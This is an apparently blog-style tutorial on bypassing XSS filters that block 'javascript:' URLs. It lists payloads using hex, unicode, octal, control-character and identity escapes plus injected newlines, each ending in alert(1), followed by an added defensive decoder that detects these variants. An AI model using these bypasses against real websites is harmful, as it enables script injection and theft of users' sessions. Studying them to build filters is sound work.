Xssing Web Part - 1
I'm thinking about sharing everything I know about XSS :) However, it's not possible to put all the methods in one single post, so I'll be writing several parts of "Xssing Web". Mostly I'll be talking about how to bypass XSS filters and how to turn most non-exploitable XSS into exploitable ones.
In this post I'll be talking about how to get XSS in such situations and how to bypass their filters.
It would execute the alert(1) function.
Format 1 : \x[HEX]
Format 2 : \u00[HEX]
Do you know we can continue a string onto the next line by ending the line with a backslash character?? ;) A backslash immediately followed by a newline inside a string literal is a line continuation, so the newline disappears from the resulting string.
Bypass : java\[0x0a]script:alert(1)
Here [0x0a] is the newline character. You can pass a newline character as input with "%0a" in the URL.
These are a few alternatives to the newline character which you can try if the newline character is also blocked:
[0x09] <---- Horizontal Tab
[0x0d] <---- Carriage Return
Do you know JS has escape sequences for control characters too??
Here are a few control character escapes that we can use to bypass the filter:
\t <---- Horizontal Tab
\n <---- Newline
\r <---- Carriage Return
Bypass : ja\nva\tscript\r:alert(1)
You can use any one or all of these control chars anywhere in the string ;)
Note: Sometimes the filter itself converts 0x0a, 0x09, 0x0d into \n, \t, \r, so you can take advantage of that too ;)
Ok, do you know the escape character??
What happens if we try to escape any character that does not form a control char (\n, \t, \b, \v, \f, \r, and of course \x and \u too)??
The answer is NOTHING: the backslash is simply dropped and the character itself is kept.
So we can put the escape char in front of any character except n, t, b, v, f, r, x, u and digits.
Bypass : \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
One of my friends, @OsandaMalith, found one more bypass. [You can read his awesome blog here]
We can encode the string in octal as well:
Format 1 : \[OCTAL]
Bypass : \152\141\166\141\163\143\162\151\160\164\072alert(1)
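Here's an added example from the filter author's side (not part of the original post, and not Osanda's code either): a small decoder that resolves the JavaScript string-literal escapes covered above (\x[HEX], \u00[HEX], octal, the control-char escapes, backslash-newline continuation and identity escapes like \j) and only then looks at the URL scheme. A filter that greps the raw text for "javascript:" misses every variant on this page; checking the decoded form catches all of them. The function names are my own.

```javascript
// Added example, not from the original post: decode a value the way a JavaScript
// string literal would, then inspect the URL scheme of the *decoded* text.
// Handles \xHH, \uHHHH, legacy octal \OOO, \n \t \r \b \v \f, backslash-newline
// line continuation and identity escapes. (ES2015 \u{...} is not handled here.)
const CONTROL_ESCAPES = { n: "\n", t: "\t", r: "\r", b: "\b", v: "\v", f: "\f" };

function decodeJsStringEscapes(s) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    const c = s[i];
    if (c !== "\\") { out += c; continue; }
    const rest = s.slice(i + 1);
    if (rest.length === 0) { out += "\\"; break; }          // dangling backslash: keep it
    let m;
    if ((m = /^x([0-9a-fA-F]{2})/.exec(rest))) {            // \xHH
      out += String.fromCharCode(parseInt(m[1], 16)); i += 3; continue;
    }
    if ((m = /^u([0-9a-fA-F]{4})/.exec(rest))) {            // \uHHHH (the post's \u00HH form)
      out += String.fromCharCode(parseInt(m[1], 16)); i += 5; continue;
    }
    if ((m = /^[0-7]{1,3}/.exec(rest))) {                   // legacy octal, at most \377
      let digits = m[0];
      if (parseInt(digits, 8) > 0xff) digits = digits.slice(0, 2);
      out += String.fromCharCode(parseInt(digits, 8)); i += digits.length; continue;
    }
    const next = rest[0];
    if (next === "\n" || next === "\r") {                   // line continuation: emits nothing
      i += (next === "\r" && rest[1] === "\n") ? 2 : 1; continue;
    }
    // control escape (\n, \t, ...) or identity escape (\j -> j, \( -> ( ...)
    out += CONTROL_ESCAPES[next] !== undefined ? CONTROL_ESCAPES[next] : next;
    i += 1;
  }
  return out;
}

// Browsers drop ASCII tab, LF and CR from a URL before parsing it and ignore
// leading/trailing whitespace, which is why ja\nva\tscript\r: still runs.
// Mirror that normalisation before comparing the scheme.
function urlScheme(raw) {
  const url = decodeJsStringEscapes(raw).replace(/[\t\n\r]/g, "").trim();
  const colon = url.indexOf(":");
  return colon === -1 ? "" : url.slice(0, colon).toLowerCase();
}

function isJavascriptUrl(raw) {
  return urlScheme(raw) === "javascript";
}
```

Run the bypasses from this post through isJavascriptUrl and every one of them comes back true, while a plain https:// URL does not.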
That's enough for today ;)